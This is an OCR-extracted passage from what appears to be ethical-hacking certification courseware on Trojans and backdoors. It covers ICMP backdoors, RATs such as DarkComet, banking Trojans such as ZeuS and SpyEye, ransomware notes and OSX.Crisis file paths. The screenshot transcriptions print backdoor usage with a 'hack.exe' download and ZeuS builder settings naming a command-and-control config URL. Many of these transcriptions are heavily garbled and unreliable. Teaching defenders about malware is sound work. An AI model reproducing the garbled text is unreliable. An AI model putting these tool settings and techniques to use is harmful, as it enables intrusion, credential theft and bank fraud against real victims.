using standard system security methods. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine. Module 06 Page 901 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 76. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors ICMP Trojan: ICMP Client (Command: icmpsend Cvictim ip>) Command Prompt Commands are sent using ICMP protocol qxisone@ hotm ail com ] — —C <List th e Process> [pskill ID] <Kill the Process> <run th e c o n man d> Srv -in sta ll — -Welcome to www.tiat ketxf i les.net— — — — — [ ICMP-Cmdvl.O beta, bygxisone ] — — [ F-mdil: gxisone@hotmail.com ] — -[ [http:/n 27.0.0.1/hack.exe =admin.exe] <Download Files. Parth is Wsystem 32> [pslist] C:Documents and SettiingsAdmini3trator.VVJDOWSDe9ktopICMP Backdoor Win32>icmp 2012/8/15] — U sag e : icm psend R em o telP Ctrl+ C or Q^q to Quite H/h for help ICMP-CMD>H Com m and IC M P-C M D (Command: icmpsrv -install) Command Prompt C:Docum ents and S«ttlngsAdm lnistrator.VINDOWSDesktopl C M P B a c k d o o r Win32>icmp Send 127.0.0.1 =====w«ico«ne to ww>v.hachgrxfil*s.n«====== — [ ICM P-Cm d v1 0 beta, by g xisone J — — { E-mail: ICMP Server ic m p s e n d 2012/8/15 J--- Usage: Ia n psrv-install <to install service> Icm psrv-re move <1.0 remove service> Transmitting File‫ . ״‬Success I Cieating Service _. Success I starting Service... Pending... success! c:Documents and SettingsAdmi nistrator. v!Ntx)WbDesktop1C M ’Backdoor FIGURE 6.27: ICMP Tunneling Module 06 Page 902 Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 77. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors R e m o te A c c e s s T r o ja n s CEH 1 1 1 Attacker gains 100% I_______ (complete) access to the system _________ Rebecca Victim Infected with RAT Trojan J 1. Hacker gains complete GUI access to the remote system 2. The Trojan connects to Port 80 to the attacker in Russia establishing a reverse connection 3. J This Trojan works like a remote desktop access Jason, the attacker, has complete control Infect (Rebecca's) computer with server.exe and plant Reverse Connecting Trojan over Rebecca's machine Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. R em ote A ccess T rojans 11 — — Remote access Trojans provide full control over the target's system to attackers and enables them to remotely access files, private conversations, accounting data, and so on in the target's machine. The remote access Trojan acts as a server, and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the target is behind a firewall on the network, there is less chance that a remote attacker would be able to connect to the Trojan. Attackers on the same network located behind the firewall can easily access the Trojans. Examples include the Back Orifice and NetBus Trojans. Another example, the Bugbear virus that hit the Internet in September 2002, installed a Trojan horse on targets' systems, giving access to sensitive data to the remote attackers. This Trojan works like a remote desktop access. The attacker gains complete GUI access to the remote system. The process is as as follows: 1. Infects (Rebecca's) computer with server.exe and plants Reverse Connecting Trojan. 2. The Trojan connects to Port 80 to the attacker in Russia establishing a reverse connection. Module 06 Page 903 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 78. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors 3. Jason, the attacker, has complete control over Rebecca's machine. Attacker gains 100% (complete) access to the system Jason Attacker Sitting in Russia Rebecca Victim Infected with RAT FIGURE 6.28: Attacker infecting victim's machine using Remote access Trojans Module 06 Page 904 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 79. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker R e m o te A c c e s s T r o ja n : RAT D a r k C o m e t a n d A p o c a ly p s e hSodi D r c ll 1z . E? 7> Wan/Qian]: Port 11 1668 M F. . ctnw . 92G V m . . icb esF L 9 C V ejF... C ictm . Y m ... lco esF IU12■viam . . 0 esF 1 . U e*F . ctm . . 1 2 p t1m 3 •* < esF... . :C« X m ... ‫ ־‬X esF C11076 V > «F Wm ... u 18C 4 Vt < & 6 ttcbm 13 C tiF... m :092 ttcanesP... G110 0 8 Ul::l6 i. 1 ** V timjf... 8 K e •I 96*» vicomwf... 1:60 . t J :2^0 wCfn«*F... u1:1 8 <bv&F... 2 • • - • • • ■ 59/[192.1... 5.154‫־‬f [192... ♦2.43/[192... *6.142 / [192... 27/[192.1... 138/[:92.... 23/] 1 2 9 ‫..״‬ •6. 136/ ] 192.... 150/ ] 192.... 27/ ] 192.1... •6.28/ ] 192.... • ♦ 2.43/ ] 192... • 55/ ] 192.1... .07/ [192.1... • - m *4/[192.16... • tm .46.142 /[192... ‫...2.87 ] /271 ״• • י‬ • • - • Sl/[192.1... .07/[192.1... mo o LSC60T-HI / C<*is3'2 0IIV2/SYSTEM AfJTHOHYLOPSZ f 5ys... PC-OESHCLGO/Sho... ANTHONYLOPEZ / u * ... SNAKE-E7D71CD4A If . . . DIV2 / Acrr»n>itr*t*ur PC■0CSHXEX3 / Sho... PCOS-MOI / rxx SNAKE137CO-PC /« **... PC0 6 •ALEX / ALEX TTANCtM / Adnrwfr«... L5C0OT-III / SYSTEM DAMJEN-PC 1d*n*c Windows Wndore Wndov• 1 Window windows Window* Wrtdows W«do/tt Windows Wndov* Vfedow• W*d0W‫ג‬ WHdOWS Wd %f9 no * W dow S in W » ndo. OAVIDOURS-PC / D*v. PC-OC-AlOC /SYSTEM ?1 * ‫ יל‬v‫<־‬ a 7 ‫ג‬ Trr».‫ •׳‬D»t D IP WAN/&.AN] : Pert 19:1 c37/:2/03/2010 4 19:14• /: 2/03/20:0 38 19; 14. •0/:2/03/20:0 ‫י‬ 19:14:44/12/03/2010 19:14t 44/12/03/20:0 VKQmesf... V1<trr«cF... k U 5T... tc • • ‫־ • • ־־‬ * • • ' I■ • vtcom esF... ‫^ - * י‬ VkbfnesF... Lpdat* tm% • • • • •. ] Status: Kt*rtng. Copyright © by EC-ClllCil. All Rights Reserved. Reproduction is Strictly Prohibited. R em ote A ccess T rojan: RAT D a rk C o m et an d A pocalypse DarkComet is a tool that allows you to remotely access the administrative controls and privileges of an infected machine without the user's knowledge or permission. It provides you with access to processes, registry, command prompts, webcams, microphones, applications and can even provide a keylogger whenever you use the system. Module 06 Page 905 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 80. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker t D omet•R T v2j0 R 3 •Uset(s): 2 arkC A C 1 IPW an/lLan]: Port C"t>ut*r Htmt/jtvU... O 0 S e ‫־‬Vr^5Ses«o [7600] . * • * 59/(1921... S0RAr*5/$y»t*m • a - 1 2 /164.‫ ...צ‬K0‫־‬ 9] C4tAC^/5r5T»r wnd»**vata Sarvica... -O -M I/S S C w oorteV SarvKt... m «U • 4:.43/[l»2... ^C C O Y T V O T-X v w » « $e‫׳‬v ceP... v !d M > • — at. 143/(*2.. .SO O n/daee*42 DIM TM Z/SO .V > X Ser.-ceP... rxS .S P •a•• 27/(1921... • • 136/[192.... ANTWa0PK/Sy*... •..•ndo‫« ־‬Sr.«n [7600] A ndov«v«staServe*... ‫? ..״2 1 ]/82.6• ׳ ־‬Ct€‫־‬ 9 ‫ ־‬SH(XOt3/Sfo... W • « 136/ [192.... A T C L0P€2/utl... Mndb«Se*n [7600] W H ^Y ‫״‬ ‫־‬ • • 150/[192.... S A E C 04Aif... Vrx»A5XPS«r,ic*P... N K ■ 7071C IM 4rrv*»?ete1r e•• %27/ [1921... 5 T/ A X Sert-ceF... P -5.28 / [192— 9C-0e-5HOtEXJ/»a... ..'‫י׳‬vata Servtca*.>0... v.rxtoA vata Service... 'S wometf. • 42.43/[1M ?C E O bo ... -O -M I/ * ‫<׳‬ vwmesf. at A. aa 55/(1921... SiA El3700^C/sr•... v.rx»A tn [7600] 5Se% W ctnxjP. • *A i£ u'n& vat»S ‫ ־‬c» r;* e% ... > • .07/(1921... ^C06‫^ ־‬X/ A X .Vto vomesF. - • 44/[192.16... TITA nx/ A Tr**fa... Y x ‫׳‬jvsx? Ser.-ceP... N d‫־‬ vorxsF. • - 6.142/[192... .S080T-m ST&‫׳‬ v.rx^Ai x? Se‫־.־‬ce P... /SY .V ‫־׳‬Se5‫[0067]1 ».־‬ rxJa T P M m . « « • 172/[78.2... 5AV»i‫ ־‬C.'dan«r cO aaP vvtim eeP. - aa %51/(192.1... D V X ftS^C ‫.^״ • ...י^ם‬sSe.t« [7600] AZX ‫״‬ v eaP aa • v07/ [192 1... 9C ‫־‬A / S S S scttm . .‫< ־‬ v c*... -0E ^X Y T 4 vnd»A vata Se‫> ־׳‬ UV«4vKVO(any*S m tm e> ‫־ •ח‬ 0/ t^an ‫ג84»י׳לג^רד0 ^יל‬ IPW N A ]:P0 A /IL N rt T eyO w ate ID 1 : 14:37/12/03/2010 9 V tjm X esF... - - :3490 i* ” 34» 1 : 14:38/12/03/2010 9 V<tme*... » . • » * I t” ah aa !]:3490 19:14:40/12/03/2010 VlctnaP... ‫• ־‬ 4 ‫0נ‬ ‫י״‬ 19:14:44/12/03/2010 v<o‫*׳‬ejp... ‫ - ־‬• • aa 3:[2‫»*״‬ 19:14:44/12/03/2010 V am X eiP... - m %a Mi — ; 3490 _ : ‫ריג־ ד‬ < 1a814:44/1?inv3ft1n _ __ m. ‫—►״‬ E tServer ck uxiate Statui! Iaterw g... > O Port(•) oan Q SendO rder* to S* 1 1668 M920 J 100 .4 M O 111012 n»44 v 1924 . 1040 I 11076 i 1104 . 13*0 .. 1092 1 1 1030 1 11116 i 1344 » 564 M !260 i 11240 I ■1129 . ‫4חיי‬ *cton 10 vyom F. w V C uP Km . vxom eeP. vkem eaP. Wm . O esF V tm . < e*P vtcom asf. v t> esF <m . vxtm wP. V tm K ejP. A . X X X X X X X X X X X X X X X X X X V C ‫א‬ X x x Png :09*5 9M 4J :66N ‫,׳‬ 9M 3* 7M 8s 33 S 4N x 173* 30 * 6M 4M 7J 9 j 3M x 9M 3s x :3 .V 3S 7M 9j x 6M 35 11 * 7M x 9M 3S x :7 M 2» 07* ‫א‬M ■ f X :2 M 5S A C n ctive aptM 0. * :at 21294s 69‫ל‬IS 8747* 5274* Prog‫׳‬am 4730* 340365 14S S5 1 81s 12 4* 4731* 15456s vertasem eot 719s avast1 •A 1 3Is ■ 5 •> ‫׳‬ ID R IO C X T 31 4 5 D IE R L C R ... __ ‫_״‬ _ 36305 SRO.Oent S 2305 L ca^eaVye(... acre 05 0 • T C a«der 7.50... otal onm 76S 1 0S an A «C 0 ct% ap6 n D IE R C R < » • 8hotm IU R I0U 0U T a<.com > WO.Oent notm lare <•/»•*> ^•® a<.fr> ' Toia C m 7.50pubfcbe‫־‬o6‫־‬M om ander . »d»etM etth... ■ 1 FIGURE 6.29: RAT DarkComet Screenshot Apocalypse Remote Access Trojan is a tool that allows you to modify the entire registry and allow .dl files to run executables. This runs in invisible mode when it is executed. Apocalypse Remote A d m in istratio n Tool v l . 4 1 .4 - V let ton Online ~ C A onnections Brooded .j Settngj / B ulder X* SUtsbcs ‫ ל‬A bout a O Irtform ahcn C er N e U oinput am sernam e Server© W an f | P W ebon C orm 0 4‫ויי‬p0crfypse_8C 6S15 9C E C273FF53A H C ... ectors 17.0 2.0.1 Server W bon ornM InstaledA ppfcattons A Ports >< ctive Message H o i Server K) apOcalypse 8 9 6 12 ‫0 . 7 1 1 . 0 ל‬ C C b 17 .0 9 2 .0 .1 U X a 5) A ccessories M«1*9«Bo . Uniag- L ai R oteD em esktop 41 M essageIcon JK r,-. W C ebcam apture ■ 4 ®OK O ym. no C' R -y C w ancol ‫ >י‬Ac oC ufc apture ‫: י־‬ajK aytoggar 0«C 4rc^ OY« N Cvcol o OM o Rrty Ignc. >» Orkie K eylogger 0 O K fftne eytoggat 0 M w m im ■ I *C fW va o * 8 o M bn Jp C hat Server © SandM essage B ^M anagers MM e anager 3 M Search e Imtalled Applications Server V : *pOcolypte BC9C6b1b 1) 1 0 0 t H O 0.1 fi& Tf y) R oteO rtoed em ow Pegstry Edtor D N e isplay am V ersion Urm stelStm g * O pboardM anager c:Program FiesC m om onM OAtfabeAB( A System In dobe s c C lpboardT ext A em R ote£> lch y em ecutor * :F C »o^arr>F A yR tasV khem fie C lpboerdM at Ij U far wndomXP(1*911164) l“ pdate M croaoft C orporation O StaticM anager )3.4.0(arH JS C :PtogramF uA Feel «esM a IM h ServiceM anager T SQ rW lyog 8.55 ) 55 »ogramM lyog T esSQ ri W abyogSoftw orfePvt.U CP d. ProcessM anager R anfrxsdon(R om otas) M 0 odJes * w p jran O .exe* c: emV sO O C:PtogranPtesw»P<**1* “‫ ־ל‬W M indow anager A E ectnoioges 4.1.0-2001 C C T C m P pt ■ om and rom C VlAnRAR actever C:Pro*an Ffesw A U *R A s OE xplorer Sattngs jW ebttfrsXP 9072-, Mcrotoft Corporation .S . S 3 *B * f% jgr sCxec.exe/I{ C d6-7 A 766A A System Incorpora... M dobe s * J Adobe Raader 9 . .3 3 s* Passw M ord anager ,H AM« A ‫׳‬ ft M 10 f an HAIM aF TTTM I9 ? □ r 2.0.3.13070 MilaFre#0■ 60) 0 (3 S F S if* ^h 4 aOC ontact U s Webste £ rw tale^ppkahor^^ecer^e^ I A bout N onnecbon‫׳‬ oC FIGURE 6.30: Apocalypse Screenshot Module 06 Page 906 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited. 93 .3 . ‫»לו 1 וחל‬ %
  • 81. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker C overt C h a n n e l T ro jan : CCTT I C EH J Covert Channel Tunneling Tool (CCTT) Trojan presents various exploitation techniques, creating arbitrary data transfer channels in the data streams authorized by a network access control system J It enables attackers to get an external server shell from within the internal network and viceversa J It sets a TCP/UDP/HTTP CONNECT | POST channel allowing TCP data streams (SSH, SMTP, POP, etc...) between an external server and a box from within the internal network Client Proxy Chain CCTT Server Copyright O by EG-Gllincil. All Rights Reserved. Reproduction is Strictly Prohibited C overt C h a n n e l T rojan: CCTT The Covert Channel Tunneling Tool is a hidden channel tool. It provides you with many probable ways to achieve and allow arbitrary data transfer channels in the data streams (TCP, UDP, HTTP) authorized by a network access control system. A Covert Channel Tunneling Tool (CCTT) Trojan presents various exploitation techniques, creating arbitrary data transfer channels in the data streams authorized by a network access control system. It enables attackers to get an external server shell from within the internal network and vice versa. It sets a TCP/UDP/HTTP CONNECT|POST channel allowing TCP data streams (SSH, SMTP, POP, etc...) between an external server and a box from within the internal network. Client Target Services FIGURE 6.31: Covert Channel Trojan Module 06 Page 907 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 82. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker E-banking Troj ans CEH im ttiM tUx*l NmIm E‫־‬b a n k in g T ro jan s E-banking Trojans are very dangerous and have become a major threat to the banking transactions performed online. This Trojan is installed on the victim's computer when he or she clicks the email attachment or clicks on some advertisement once the target logins in to the banking site. The Trojan is preprogrammed with a minimum range and maximum range to steal. So it doesn't withdraw all the money from the bank. Then the Trojan creates screenshots of the bank account statement; the victims aren't aware of this type of fraud and thinks that there is no variation in their bank balance unless they check the balance from other systems or from ATM machines. Only when they check the balance will the differences be noticed. The following diagram explains how the attack is carried out using E-banking Trojans. Module 06 Page 908 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 83. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Malicious advertisements published among the legitimate websites Uploads malicious advertisements User access to infected website Malware Server ' ‘W ^ User redirects to malicious exploit kit The website is redirected to —• • the maNciousexploit kit 4 W Legitimate Websites Trojan reports for a new bot Sends instruction to the Troj, ^0 s. The User's PC exploited ^ Trojan reports user activities Attacker ’ * r 9# ! $ ‫י‬ |JI] | w Instruction to manipulate banks transactions User access bankA/C Manipulates user's bank transaction ■2 ># Control and Command Server A Reports about successful/failed transaction Financial Institution FIGURE 6.32: illustrating the attack using E-banking Trojans Here the attacker first infects the malicious advertisements and publishes these advertisements among genuine websites. When the victims access the infected website, it automatically redirects him or her to a website from where the exploit kit gets loaded onto the victim's system. Thus, the exploit kit allows the attacker to control what is loaded in the victim's system and used for installing a Trojan horse. This malware is highly obfuscated and can only be detected by few anti-virus systems. The system of the victim is now a botnet from where the Trojan easily sends and receives instruction from the control and command server without the knowledge of the victim. When a victim access his or her bank account from the infected system, all the sensitive information, i.e., used by the victim in accessing account information such as login credentials (user name password), phone number, security number, date of birth, etc. are sent to the Control and Command Server by the Trojan. If the victim is accessing the transaction section of the banking website for performing online transactions, then the data that is entered by the victim on the transaction form is sent to the Control and Command Server instead of to the bank website. The control and command server system analyzes and decodes the information and identifies suitable money mule bank accounts. The Trojan receives instructions from the control and command server to send the latest transaction form that is updated by the control and command server to the bank for transferring money to the mule account. Confirmation from the bank about successful/failed transaction of the money that was transferred is also reported by the Trojan to the control and command server. Module 06 Page 909 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 84. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Banking Trojan Analysis I CEH (•rtifwtf e Trojan intercepts valid entered by a user 0 It replaces the TAN with a random number that will be rejected by the bank ItkNjI Nm Iw • I Q Attacker can misuse the intercepted TAN with the user's login details Trojan creates fake form fields on e-banking pages Additional fields elicit extra information such as card number and date of birth Attacker can use this information to impersonate and compromise victim's account a Trojan analyses POST requests and responses to victim's browser a It compromises the scramble pad authentication a Trojan intercepts scramble pad input as user enters Customer Number and Personal Access Code Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. B an k in g T rojan A nalysis A banker Trojan is a malicious program that allows obtaining personal information about users and clients using online banking and payment systems. A banking Trojan analysis involves the following three basic types: Tan Gabbler: A Transaction Authentication Number (TAN) is used for authenticating the online banking transaction, which is a single-use password. The banking Trojan explicitly attacks the target's online banking services that depend on the TAN. When the TAN is entered, the Trojan grabs that number and changes that number with any random number that is incorrect and rejected by the bank. The content is filtered by the Trojan and the incorrect number is replaced in order to satisfy the target. An attacker can misuse the intercepted TAN with the target's login details. HTML Injection: This type of Trojan creates duplicate fields on the online banking sites and these extra fields are used by the attacker to collect the targets account details, credit card number, date of birth, etc. Attackers can use this information to impersonate and compromise the target's account. Form Grabber: This is an advanced method of collecting data from the Internet available on the various browsers. This is highly effective in collecting the target IDs, passwords, and other sensitive information. Module 06 Page 910 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 85. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker E ‫־‬b a n k in g T ro ja n : ZeuS a n d SpyE ye J The main objective of ZeuS and SpyEye Trojans is to steal bank and credit card account information, ftp data, and other sensitive information from infected computers via web browsers and protected storage J C EH SpyEye can automatically and quickly initiate an online transaction ZeuS Control Panel Builder Config and loader tuldng Sou‫־‬c9corfig file: SpyEye ' :iHnri !rents and | Edit conFg ] ( Bjild corFij ] M o ^ J f ln O W O jl Statistic Settings J Output L00dr>3 conFlg from filo 1 00jrnorts ond C:D aemnQSlK0bayaihDesttoprroyanoJ»j:AZeu5bMlccnf1 Q.M Loodng succoododl craacino l a e f e > : r e t a 1c o d r i : l 0: u r n s r SoltlngsKoboya5hDosW:oprrovano ZouSVdr.oxo1. bolneH MAIN I trr»r_ccnfig-3SOCOOO, 60000 tmsrJ 0as-*>ui)ui). touuu trror_5tate- 60000 ,200000 ‫נ‬ irl conl‫־‬a ‫=׳‬hO:D://203.H 2.10.2/ ‫/׳<׳‬ou‫׳‬travfv»ed.iclabr1 u‫׳‬l_compip-h‫:׳‬tp ://Wiabsmyip. car/ tsjld succeeded! ( ’pJN tvJ at hr!‫*/ ,'־‬vox miorrtoft-Anvlowi M 0 Ooyou*••) *anrtoMrm<tN)«(v«v1 4 w )c«0 «x<»«1 1 ’ CK ‫ן‬ Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. E‫־‬b a n k in g T rojan: ZeuS an d SpyEye ZeuS Source: http://www.secureworks.com ZeuS is a latest threat for online banking transactions as it uses both form grabber as well as keystroke logging. It is mainly spread through drive-by downloads and phishing schemes. The ZeuS botnet targets only Windows. New version of ZeuS even affects Windows Vista. It has evolved over time and includes a full arsenal of information stealing capabilities: © Steals data submitted in HTTP forms 0 Steals account credentials stored in the Windows Protected Storage Q Steals client-side X.509 public key infrastructure (PKI) certificates 0 Steals FTP and POP account credentials Q Steals/deletes HTTP and Flash cookies 9 Modifies the HTML pages of target websites for information stealing purposes 9 Redirects targets from target web pages to attacker controlled ones Q Takes screenshots and scrapes HTML from target sites Module 06 Page 911 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 86. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker 9 Searches for and uploads files from the infected computer 9 Modifies the local hosts file (%system root%system32driversetchosts) 9 Downloads and executes arbitrary programs 9 Deletes crucial registry keys, rendering the computer unable to boot into Windows &» ZeuS Control Panel Builder Config and loader building Source config file: IBuilder Logs decoder 1 C:Documents and SettingsKobayash DesktopTroyano_ZeuSV [ Browse... Edit config | | Build config | | | Build loader Output Loading config from fie 'C:Documents and SetthgsKobayashiDesktopTroyano_ZeuSZeuSlocalconfig.txt'... Loading succeeded1 Creating loader file 'C:Documents and SettngsKobayashiDesktopTroyano ZeuSldr.exe'... botnet«[MAIN] timer_conf!g-3600000, 60000 timerJogs-60000, 60000 timer_stats-1200000, 60000 url_config-http://203.142.10.2/~ytxjrtrav/web/cfg.bin url_comp!p=http://what smyp.com/ Buld succeeded! * 1 FIGURE 6.33: ZeuS Screenshot SpyEye r SpyEye is malicious software that is used by the attacker to steal targets' money from online bank accounts. Actually, this is a botnet with a network of command-and-control servers. This automatically triggers when the target starts his or her transaction and can even block the bank's transactions. Spy Eye 2009 O * * ‫נ‬ 133120 ^ 12/79 1 Find INFO 21 2: Statistic Settings 1I ‫נ‬ L ‫•« ו‬ G e t s t a t is t ic Get hosts D«V for : *‫ ם״‬t ‫יי׳‬ CTp»Hk*m m* http //www.m!crosoft‫־‬w<ndows-s<cufTty com co_ © 90 0 09 Do you really to ban th « hotf (wwMr. OK w.d«lm(H«*nung ■com [ Ot m o m k .c m ) ? ] 431 427 342 •X •X •X •X •X •X •X »x •X •X FIGURE 6.34: SpyEyeScreenshot Module 06 Page 912 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 87. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker D estructive Trojans: M 4sT3r Trojan d estructive ty p e of Trojan This Trojan formats all local and network drives When executed, this Trojan destroys the operating system C EH The user will not be able to boot the Operating System M 4sT3r is a dangerous and Format USB Drive, network Drive.... Format C: E: F:.... Copyright © by EG-G(Uncil. All Rights Reserved. Reproduction Is Strictly Prohibited r D estru ctiv e T rojans: M 4sT 3r T rojan The M4sT3r Trojan is exclusively designed to destroy or delete files from the victim's computer. Files are automatically deleted by the Trojans, which can be controlled by the attacker or can be preprogrammed like a logic bomb to perform a particular task on a given time and date. When executed, this Trojan destroys the operating system. The victim cannot boot the operating system. This Trojan formats all local and network drives. F o rm a t USB D riv e , n e tw o rk D r iv e ..... F o rm a t C : E : F : ..... M4sT3r Trojan FIGURE 6.35: Attacker using M4sT3r Trojan for deleting or destroying files Module 06 Page 913 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 88. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Notificatior Troj ans ■ Notification Trojan sends the location of the victim's IP address to the attacker B Whenever the victim's computer connects to the Internet, the attacker receives the notification Notification Types ■> SIN Notification Directly notifies the attacker's server ■ > ICQ Notification Notifies the attacker using ICQ channels » PHP Notification Sends the data by connecting to PHP server on the attacker's server ■> E-Mail Notification Sends the notification through email Victim }■ > Net Send Notification is sent through net send command Infected with Trojan j. .» CGI Notification Sends the data by connecting to PHP server on the attacker's server •> IRC notification Notifies the attacker using IRC channels Copyright © by EG-Gouncil. All Rights jie$erv6<t;Reproduction is Strictly Prohibited. N otification T ro jan s Notification Trojans send the IP address of the victim's computer to the attacker. Whenever the victim operates the system, the notification Trojan notifies the attacker. Some of the notifications include: © SIN Notification: Directly notifies the attacker's server 0 ICQ Notification: Notifies the attacker using ICQ channels 0 PHP Notification: Sends the data by connecting to PHP server on the attacker's server 0 Email Notification: Sends the notification through email 0 Net Send: Notification is sent through net send command © CGI Notification: Sends the data by connecting to PHP serveron the attacker's server © IRC notification: Notifies the attacker using IRC channels Module 06 Page 914 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 89. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Credit Card Troj ans CEH UrtifW Credit card Trojans steal victims' credit card related data such as card no., CVV2, and billing details Attacker A itkMl lUckw : Credit card Trojans trick users to visit fake ebanking websites and enter personal information w ‫<יי‬ Victim A VISA Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited C red it C ard T ro jan s Credit card Trojans, once they are installed on the victim's system, collect various details such as credit card numbers, latest billing details, etc. Then, a fake online banking registration form is created and they make the credit card user believe that it is genuine information from the bank. Once the user enters the required information, attackers collect the information and use the credit card for personal use without the knowledge of the victim. Credit card Trojans steal victims' credit-card-related data such as card number, CVV2s, and billing details. These Trojans trick users into visit fake e-banking websites and entering personal information. The Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods. Module 06 Page 915 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 90. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker FIGURE 6.36: Attacker stealing credit card information of victim's using credit card Trojan Module 06 Page 916 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 91. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker D ata Hiding Trojans (Encrypted Trojans) Attackers demand a ransom or force victims to make purchases from their online drug stores in return for the password to unlock files Encryption Trojan encrypts data files in victim's system and renders information unusable "Your computer caught our software while browsing i l g lpom pages, a l your lea l documents, textf l s ie, databases i the n folder / Company M y Documents Database was encrypted with complex password." C ♦source code ♦ Personal Information (S Important Files & Folders - - ‫ ־‬F 'Do not t y to search r for a program that k encrypted your ™ >information - i t ' simply does not Confidential Documents exi t i your ss n hard disk anymore," Financial pay us the money to Informationw unlock the password Copyright © by EC-CMICil. All Rights Jte$ervfei;Reproduction is Strictly Prohibited. D ata H iding T ro jan s (E n cry p ted T rojans) Encryption Trojans encrypt the data present on the victim's computer and renders the complete data unusable: "Your computer caught our software while browsing illegal porn pages, all your documents, text files, databases in the folder My Documents was encrypted with complex password." Attackers demand a ransom or force victims to make purchases from their online drugstores in return for the password to unlock files: "Do not try to search for a program that encrypted your information - it simply does not exists in your hard disk anymore," pay us the money to unlock the password." This can be decrypted only by the attacker, who demands money, or they can force the user buy from a few websites for decryption. Module 06 Page 917 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 92. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker OS X Trojan: Crisis B CEH OSX.Crisis is a Trojan horse that steals potentially confidential information and opens a back door on the compromised computer When the Trojan is executed, it creates the following directories and files: /System/Libra ry/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/MacOS/com. apple, mdw orker_server /System/Libra ry/Frameworks/Foundation.framework/XPCServices/com.apple.nndworker_server.xpc/Contents/Resources/ $HOME/Library/LaunchAgents/com.apple.mdworker.plist $HOME/Library/Preferences/jl3V7we.app $HOME/Library/ScriptingAdditions/appleHID/Contents/lnfo.plist $HOME/library/ScriptingAdditions/appleHID/Contents/MacOS/IUnsA3Ci.Bz7 SHOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r Crisis may perform the following actions: 1 --------------------------- V Monitor Skype Audio traffic Record conversations in MS Messenger and Adium Monitor Safari or Firefox to record websites and capture screenshots Send files to the command and control server ‫ר״‬ _ J i Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. m■ i OS X T rojan: C risis OSX.Crisis is a Trojan horse that steals potentially sensitive information that is on the victim's system and opens a back door on the compromised computer (victim's system) for future attacks. When the Trojan is executed, it creates the following directories and files: /System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworke r_server. xpc/Contents/MacOS/com.apple.mdworker_server /System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworke r_server. xpc/Contents/Resources/ $HOME/Library/LaunchAgents/com.apple.mdworker.plist $HOME/Library/Preferences/j13V7we. app $HOME/Library/ScriptingAdditions/appleHID/Contents/Info.plist $HOME/Library/ScriptingAdditions/appleHID/Contents/MacOS/lUnsA3Ci. Bz7 $HOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r The following are the actions performed by 